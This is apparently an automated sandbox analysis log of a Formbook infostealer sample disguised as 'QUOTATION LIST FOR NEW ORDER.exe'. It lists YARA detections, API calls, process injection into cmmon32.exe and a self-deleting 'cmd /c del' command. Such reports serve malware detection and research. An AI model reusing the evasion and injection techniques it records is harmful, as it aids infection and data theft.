          Source: 10.2.QUOTATION LIST FOR NEW ORDER.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 10.2.QUOTATION LIST FOR NEW ORDER.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000C.00000002.513637775.0000000000540000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000C.00000002.513637775.0000000000540000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.373559944.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.373559944.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.374153809.0000000000B80000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.374153809.0000000000B80000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000C.00000002.515171970.0000000003040000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000C.00000002.515171970.0000000003040000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.374626991.00000000010B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.374626991.00000000010B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Initial sample is a PE file and has a suspicious nameShow sources
          Source: initial sampleStatic PE information: Filename: QUOTATION LIST FOR NEW ORDER.exe
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeCode function: 10_2_004181B0 NtCreateFile,10_2_004181B0
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeCode function: 10_2_00418260 NtReadFile,10_2_00418260
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeCode function: 10_2_004182E0 NtClose,10_2_004182E0
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeCode function: 10_2_00418390 NtAllocateVirtualMemory,10_2_00418390
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeCode function: 10_2_0041825D NtReadFile,10_2_0041825D
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeCode function: 10_2_0041838C NtAllocateVirtualMemory,10_2_0041838C
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04819840 NtDelayExecution,LdrInitializeThunk,12_2_04819840
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04819860 NtQuerySystemInformation,LdrInitializeThunk,12_2_04819860
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048199A0 NtCreateSection,LdrInitializeThunk,12_2_048199A0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048195D0 NtClose,LdrInitializeThunk,12_2_048195D0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04819910 NtAdjustPrivilegesToken,LdrInitializeThunk,12_2_04819910
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04819540 NtReadFile,LdrInitializeThunk,12_2_04819540
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048196D0 NtCreateKey,LdrInitializeThunk,12_2_048196D0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048196E0 NtFreeVirtualMemory,LdrInitializeThunk,12_2_048196E0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04819650 NtQueryValueKey,LdrInitializeThunk,12_2_04819650
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04819A50 NtCreateFile,LdrInitializeThunk,12_2_04819A50
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04819660 NtAllocateVirtualMemory,LdrInitializeThunk,12_2_04819660
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04819780 NtMapViewOfSection,LdrInitializeThunk,12_2_04819780
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04819FE0 NtCreateMutant,LdrInitializeThunk,12_2_04819FE0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04819710 NtQueryInformationToken,LdrInitializeThunk,12_2_04819710
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048198A0 NtWriteVirtualMemory,12_2_048198A0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048198F0 NtReadVirtualMemory,12_2_048198F0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04819820 NtEnumerateKey,12_2_04819820
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0481B040 NtSuspendThread,12_2_0481B040
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048199D0 NtCreateProcessEx,12_2_048199D0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048195F0 NtQueryInformationFile,12_2_048195F0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04819520 NtWaitForSingleObject,12_2_04819520
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0481AD30 NtSetContextThread,12_2_0481AD30
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04819950 NtQueueApcThread,12_2_04819950
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04819560 NtWriteFile,12_2_04819560
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04819A80 NtOpenDirectoryObject,12_2_04819A80
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04819A00 NtProtectVirtualMemory,12_2_04819A00
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04819610 NtEnumerateValueKey,12_2_04819610
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04819A10 NtQuerySection,12_2_04819A10
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04819A20 NtResumeThread,12_2_04819A20
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04819670 NtQueryInformationProcess,12_2_04819670
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048197A0 NtUnmapViewOfSection,12_2_048197A0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0481A3B0 NtGetContextThread,12_2_0481A3B0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04819B00 NtSetValueKey,12_2_04819B00
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0481A710 NtOpenProcessToken,12_2_0481A710
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04819730 NtQueryVirtualMemory,12_2_04819730
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04819760 NtOpenProcess,12_2_04819760
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04819770 NtSetInformationFile,12_2_04819770
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0481A770 NtOpenThread,12_2_0481A770
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_03058390 NtAllocateVirtualMemory,12_2_03058390
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_03058260 NtReadFile,12_2_03058260
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_030582E0 NtClose,12_2_030582E0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_030581B0 NtCreateFile,12_2_030581B0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0305838C NtAllocateVirtualMemory,12_2_0305838C
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0305825D NtReadFile,12_2_0305825D
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeCode function: 10_2_0040102610_2_00401026
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeCode function: 10_2_0040103010_2_00401030
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeCode function: 10_2_0041C08910_2_0041C089
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeCode function: 10_2_0041C8A410_2_0041C8A4
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeCode function: 10_2_0041BAC810_2_0041BAC8
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeCode function: 10_2_0041BB2610_2_0041BB26
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeCode function: 10_2_00408C4B10_2_00408C4B
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeCode function: 10_2_00408C5010_2_00408C50
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeCode function: 10_2_0041B49310_2_0041B493
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeCode function: 10_2_0041B49610_2_0041B496
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048020A012_2_048020A0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048A20A812_2_048A20A8
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047E841F12_2_047E841F
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0489100212_2_04891002
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047EB09012_2_047EB090
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0480258112_2_04802581
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047D0D2012_2_047D0D20
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047F412012_2_047F4120
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047DF90012_2_047DF900
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048A2D0712_2_048A2D07
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047ED5E012_2_047ED5E0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048A1D5512_2_048A1D55
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047F6E3012_2_047F6E30
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048A2EF712_2_048A2EF7
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0480EBB012_2_0480EBB0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048A1FF112_2_048A1FF1
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0305C8A412_2_0305C8A4
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_03042FB012_2_03042FB0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0305C57812_2_0305C578
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_03042D9012_2_03042D90
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_03048C4B12_2_03048C4B
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_03048C5012_2_03048C50
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0305B49612_2_0305B496
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: String function: 047DB150 appears 35 times
          Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000000.242234639.00000000006CC000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameTup.exe: vs QUOTATION LIST FOR NEW ORDER.exe
          Source: QUOTATION LIST FOR NEW ORDER.exe, 00000009.00000002.302259006.00000000001DC000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameTup.exe: vs QUOTATION LIST FOR NEW ORDER.exe
          Source: QUOTATION LIST FOR NEW ORDER.exe, 0000000A.00000002.375144383.000000000139F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs QUOTATION LIST FOR NEW ORDER.exe
          Source: QUOTATION LIST FOR NEW ORDER.exe, 0000000A.00000000.304360441.00000000006DC000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameTup.exe: vs QUOTATION LIST FOR NEW ORDER.exe
          Source: QUOTATION LIST FOR NEW ORDER.exeBinary or memory string: OriginalFilenameTup.exe: vs QUOTATION LIST FOR NEW ORDER.exe
          Source: QUOTATION LIST FOR NEW ORDER.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 10.2.QUOTATION LIST FOR NEW ORDER.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 10.2.QUOTATION LIST FOR NEW ORDER.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 10.2.QUOTATION LIST FOR NEW ORDER.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 10.2.QUOTATION LIST FOR NEW ORDER.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000C.00000002.513637775.0000000000540000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000C.00000002.513637775.0000000000540000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.373559944.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.373559944.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.374153809.0000000000B80000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.374153809.0000000000B80000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000C.00000002.515171970.0000000003040000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000C.00000002.515171970.0000000003040000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.374626991.00000000010B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.374626991.00000000010B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: QUOTATION LIST FOR NEW ORDER.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: QUOTATION LIST FOR NEW ORDER.exeStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
          Source: classification engineClassification label: mal100.troj.evad.winEXE@9/1@5/2
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\QUOTATION LIST FOR NEW ORDER.exe.logJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5984:120:WilError_01
          Source: QUOTATION LIST FOR NEW ORDER.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: QUOTATION LIST FOR NEW ORDER.exeVirustotal: Detection: 61%
          Source: QUOTATION LIST FOR NEW ORDER.exeMetadefender: Detection: 37%
          Source: QUOTATION LIST FOR NEW ORDER.exeReversingLabs: Detection: 63%
          Source: unknownProcess created: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exe 'C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exe'
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeProcess created: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exe C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exe
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeProcess created: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exe C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cmmon32.exe C:\Windows\SysWOW64\cmmon32.exe
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeProcess created: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exe C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeProcess created: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exe C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeJump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exe'Jump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: QUOTATION LIST FOR NEW ORDER.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: QUOTATION LIST FOR NEW ORDER.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
          Source: QUOTATION LIST FOR NEW ORDER.exeStatic file information: File size 1347072 > 1048576
          Source: QUOTATION LIST FOR NEW ORDER.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x148400
          Source: QUOTATION LIST FOR NEW ORDER.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 0000000B.00000000.343228042.000000000E7F0000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: QUOTATION LIST FOR NEW ORDER.exe, 0000000A.00000002.374856007.000000000120F000.00000040.00000001.sdmp, cmmon32.exe, 0000000C.00000002.516057002.00000000048CF000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: QUOTATION LIST FOR NEW ORDER.exe, 0000000A.00000002.374856007.000000000120F000.00000040.00000001.sdmp, cmmon32.exe
          Source: Binary string: wscui.pdb source: explorer.exe, 0000000B.00000000.343228042.000000000E7F0000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeCode function: 10_2_0040607C push esi; ret 10_2_0040607D
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeCode function: 10_2_0041BAC8 push dword ptr [B7831292h]; ret 10_2_0041BB25
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeCode function: 10_2_0041A2E5 push es; ret 10_2_0041A327
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeCode function: 10_2_0041C2AF pushad ; iretd 10_2_0041C2B0
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeCode function: 10_2_0040C376 push es; ret 10_2_0040C377
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeCode function: 10_2_0041B3F2 push eax; ret 10_2_0041B3F8
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeCode function: 10_2_0041B3FB push eax; ret 10_2_0041B462
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeCode function: 10_2_0041B3A5 push eax; ret 10_2_0041B3F8
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeCode function: 10_2_0041B45C push eax; ret 10_2_0041B462
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeCode function: 10_2_00415C8D push esi; retf 10_2_00415C9B
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0482D0D1 push ecx; ret 12_2_0482D0E4
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0304C376 push es; ret 12_2_0304C377
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0305B3A5 push eax; ret 12_2_0305B3F8
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0305B3F2 push eax; ret 12_2_0305B3F8
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0305B3FB push eax; ret 12_2_0305B462
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0305C2AF pushad ; iretd 12_2_0305C2B0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0305A2E5 push es; ret 12_2_0305A327
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0305BAF4 push dword ptr [B7831292h]; ret 12_2_0305BB25
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0304607C push esi; ret 12_2_0304607D
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_03054E36 push edx; iretd 12_2_03054E45
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_03055599 push ds; ret 12_2_0305559A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0305B45C push eax; ret 12_2_0305B462
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_03055C8D push esi; retf 12_2_03055C9B
          Source: initial sampleStatic PE information: section name: .text entropy: 7.77803780051
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
